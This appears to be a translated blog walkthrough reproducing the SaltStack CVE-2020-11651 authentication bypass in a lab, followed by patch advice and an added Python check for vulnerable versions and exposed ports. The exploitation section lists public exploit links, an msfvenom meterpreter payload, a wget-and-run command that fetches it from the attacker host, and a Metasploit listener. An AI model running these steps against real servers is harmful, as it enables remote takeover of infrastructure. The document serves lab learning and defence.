2025-01-17 Update From: SLTechnology News&Howtos, Network Security
Shulou(Shulou.com)05/31 Report--
In this issue, the editor presents an example analysis of reproducing the SaltStack authentication bypass vulnerability CVE-2020-11651. The article is detailed and walks through the reproduction from a professional point of view. I hope you get something out of it.
1. Brief introduction
SaltStack is a configuration management tool based on Python. It is a centralized management platform for server infrastructure that provides configuration management, remote execution, monitoring and other functions. It is implemented in Python and built on a lightweight message queue (ZeroMQ) together with Python third-party modules (PyZMQ, PyCrypto, Jinja2, python-msgpack, PyYAML and others).
By deploying SaltStack, operations staff can execute commands in batches on tens of millions of servers, centrally manage configuration, distribute files, collect server data, and manage the operating system baseline and software packages according to the needs of different businesses. SaltStack is a sharp tool for operations staff to improve efficiency and standardize business configuration and operation.
2. Overview
CVE-2020-11651 is an authentication bypass vulnerability: by constructing malicious requests, an attacker bypasses the verification logic of the Salt Master, calls functions that should require authorization, and ultimately achieves remote command execution.
3. Scope of impact of vulnerability
SaltStack < 2019.2.4
SaltStack < 3000.2
4. Repair version
2019.2.4
3000.2
5. Vulnerability reproduction
5.1 Description of the environment:
Target machine: 192.168.190.128 (Ubuntu 18.04; the vulnerable environment is built with Docker)
Attack machine: 192.168.190.129 (Kali 2020.4)
Exp: https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP
5.2 Pull the image
docker pull vulfocus/saltstack-cve_2020_11651
Pulling the image may be a bit slow; configuring a Docker image accelerator (registry mirror) is recommended.
Since I have already pulled the image, I will go straight to the next step.
5.3 Start the image
docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651
Check whether the container is running:
docker ps
The environment started successfully.
5.4 Vulnerability exploitation
1. Install the Python salt module
pip3 install salt
Check whether salt was installed successfully:
pip3 list
2. Run the exp
python3 CVE-2020-11651.py
3. Try to read a file
4. Try to get a reverse shell
1. The reverse shell failed in the normal way
I tried many methods, changed the exp and changed the callback port number, but none of them succeeded.
2. Looking for the cause of the failure
After searching for a long time, I finally found an article. The reason the shell could not be returned may be that there is no nc command in the Docker environment that was built.
Testing on the target machine showed that the nc command was in fact installed.
It then occurred to me that my attack machine Kali is version 2020.4, whose shell is zsh, while the shell used by Ubuntu is bash. I guessed this might be the reason the shell could not be returned.
I tried changing the shell of Kali to bash, but that failed too.
3. Upload a Trojan
Following the method in the article:
Replace the exp: https://github.com/dozernz/cve-2020-11651
Then generate a Trojan named test on the attack machine:
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.190.129 LPORT=6666 -i 3 -f elf -o test
Start Apache on the attack machine:
/etc/init.d/apache2 start
Check whether Apache is running:
service apache2 status
Copy the Trojan to the root of the Apache web site:
cp test /var/www/html/test
Use the exp to execute a command that downloads it remotely (the error shown is a problem in the exp script itself):
python3 CVE-2020-11651.py 192.168.190.128 master 'wget http://192.168.190.129/test|./test'
Add execute permission:
python3 CVE-2020-11651.py 192.168.190.128 master 'chmod +x test | ./test'
4. Start the listener
1. Start msf
msfconsole
2. Load the module
use exploit/multi/handler
3. Set the payload
set payload linux/x64/meterpreter/reverse_tcp
4. Set the listening IP and port
set lhost 192.168.190.129
set lport 6666
5. Run it
exploit
6. Execute the Trojan remotely on the target machine
python3 CVE-2020-11651.py 192.168.190.128 master './test'
7. The session was obtained successfully
6. Vulnerability repair scheme
SaltStack has officially released fixed versions. Affected users should update to the secure version or later as soon as possible, and take a snapshot backup before upgrading.
Enable SaltStack automatic updates so that patches are obtained promptly, or upgrade to a secure version.
Do not expose the default listening ports of the Salt Master (4505, 4506) to the public network; restrict them so that only trusted hosts can reach them.
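As an added example (not code from the original article or from SaltStack), the following script turns the repair scheme above and the affected/fixed versions from sections 3 and 4 into two checks a defender can run on a Salt Master: whether the installed version falls inside the affected ranges (< 2019.2.4 on the date-based line, < 3000.2 on the 3000.x line), and whether ports 4505/4506 are bound to a wildcard address in ss -ltn output. The ss output embedded below is constructed sample data, not captured from a real host, and the function names are this example's own.

```python
"""Hardening checks for a Salt Master against CVE-2020-11651.

Added example, not code from the article or from SaltStack. It encodes the
version ranges the article lists as affected and flags Salt Master ports
bound to every interface. SAMPLE_SS_* below is constructed sample output.
"""
import re
from typing import Dict, List, Tuple

FIXED_LEGACY = (2019, 2, 4)   # fixed release on the 2019.2.x line
FIXED_3000 = (3000, 2)        # fixed release on the 3000.x line
SALT_PORTS = {4505, 4506}     # ZeroMQ publisher and request server ports


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn 'salt 3000.1', '2019.2.3' or 'Salt: 3001' into a tuple of ints."""
    m = re.search(r"(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"no version number found in {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_vulnerable(version_text: str) -> bool:
    """True when the version is in the ranges the article lists as affected."""
    v = parse_version(version_text)
    if v[0] < 3000:            # date-based scheme: 2018.3.x, 2019.2.x, ...
        return v < FIXED_LEGACY
    return v < FIXED_3000      # numeric scheme: 3000, 3000.1, 3001, ...


def exposed_salt_ports(ss_output: str) -> List[int]:
    """Return Salt Master ports that `ss -ltn` shows bound to a wildcard address."""
    exposed = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue                      # skips the header and non-listeners
        host, _, port = fields[3].rpartition(":")  # 'Local Address:Port'
        if not port.isdigit() or int(port) not in SALT_PORTS:
            continue
        if host in ("0.0.0.0", "*", "[::]"):
            exposed.add(int(port))
    return sorted(exposed)


def assess(version_text: str, ss_output: str) -> Dict[str, object]:
    """Combine both checks into one report dictionary."""
    return {
        "vulnerable_version": is_vulnerable(version_text),
        "exposed_ports": exposed_salt_ports(ss_output),
    }


# Constructed sample: a Master listening on all interfaces (the risky case).
SAMPLE_SS_EXPOSED = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       1000    0.0.0.0:4505        0.0.0.0:*
LISTEN  0       1000    0.0.0.0:4506        0.0.0.0:*
LISTEN  0       128     127.0.0.1:8000      0.0.0.0:*
"""

# Constructed sample: the same Master bound only to an internal address.
SAMPLE_SS_HARDENED = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       1000    10.0.0.5:4505       0.0.0.0:*
LISTEN  0       1000    10.0.0.5:4506       0.0.0.0:*
"""

if __name__ == "__main__":
    # On a real host: assess(subprocess.check_output(["salt", "--version"], text=True),
    #                        subprocess.check_output(["ss", "-ltn"], text=True))
    print(assess("salt 3000.1", SAMPLE_SS_EXPOSED))
    print(assess("salt 3000.2", SAMPLE_SS_HARDENED))
```

Binding the Master to an internal address only reduces exposure; a host firewall limiting 4505/4506 to the minions' source addresses is still needed for the public-network restriction the repair scheme asks for, and neither replaces upgrading to 2019.2.4 or 3000.2.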
The above is the editor's example analysis of reproducing the SaltStack authentication bypass vulnerability CVE-2020-11651. If you have similar doubts, you may refer to the analysis above. If you want to learn more, you are welcome to follow the industry information channel.